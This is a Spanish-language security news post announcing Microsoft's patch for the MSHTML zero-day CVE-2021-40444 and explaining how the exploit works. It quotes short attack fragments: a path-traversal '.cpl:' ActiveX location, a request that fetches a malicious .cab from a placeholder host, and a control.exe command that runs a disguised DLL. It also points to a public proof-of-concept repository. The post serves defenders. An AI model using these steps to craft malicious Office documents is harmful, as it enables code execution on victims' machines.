15 sep. 2021

Microsoft publica el parche para el 0-day de MSHTML (CVE-2021-40444) - PARCHEA YA!

Microsoft publicó la actualización KB5005565 para vulnerabilidad Zero-Day CVE-2021-40444 crítica en el motor de renderizado MSHTML. Esta vulnerabilidad permite la ejecución de comandos en la máquina de la víctima cuando esta abre un documento especialmente diseñado y hace clic en "Habilitar contenido" para deshabilitar la función Vista protegida de Microsoft Office.

Funcionamiento del exploit:

  1. El documento contiene un objeto MHTML OLE que es un sitio web alojado en un endpoint controlado por un atacante.
  2. El sitio web ejecuta código JavaScript ofuscado que crea una instancia de los controles ActiveX: ActiveXObjectVAR['Script']['location'] = '.cpl:../../../AppData/Local/Temp/Low/championship.inf'
  3. El código del sitio web obtiene y abre un archivo .cab desde el endpoint controlado por el atacante: XMLHttpRopen['call'](XMLHttpR, 'GET', 'http://127.0.0.1/test.cab', ![]). Este archivo contiene una DLL maliciosa con extensión .inf.
  • El código del sitio web ejecuta el archivo .inf como un archivo del Panel de control (.cpl) utilizando la utilidad control.exe. Por ejemplo, el código del sitio web puede ejecutar el siguiente comando: control.exe .cpl: ../../../AppData/Local/Temp/championship.inf.
  • La utilidad control.exe se ejecuta como un proceso secundario del proceso que aloja la aplicación de Microsoft Office que abrió el documento de Office, como winword.exe.
  • El archivo DLL malicioso .inf se ejecuta en el contexto de rundll32.exe.
  • Hasta ahora las mitigaciones contra CVE-2021-40444 iban desde sugerir que se deshabilite ActiveX para la mayoría o todas las zonas de seguridad de Internet Explorer, así como deshabilitar el Shell Preview en el Explorador de Windows; esto se puede hacer a través de la Política de grupo o localmente a través de claves de registro.

    Además ya hay varias PoCs que permiten armar documentos maliciosos que explotan CVE-2021-40444, entre los que destacamos sin duda el repositorio de Lockebyte que contiene varios scripts y HTMLs que reproducen el exploit y facilitan la vida.

    Si se rehace la plantilla maliciosa para que no requiera un nuevo control ActiveX estas mitigaciones pueden eludirse. Por lo tanto se debe actualizarse a la brevedad.

    Fuente: HackPlayers

    1 comentario:

    Gracias por dejar un comentario en Segu-Info.

    Gracias por comentar!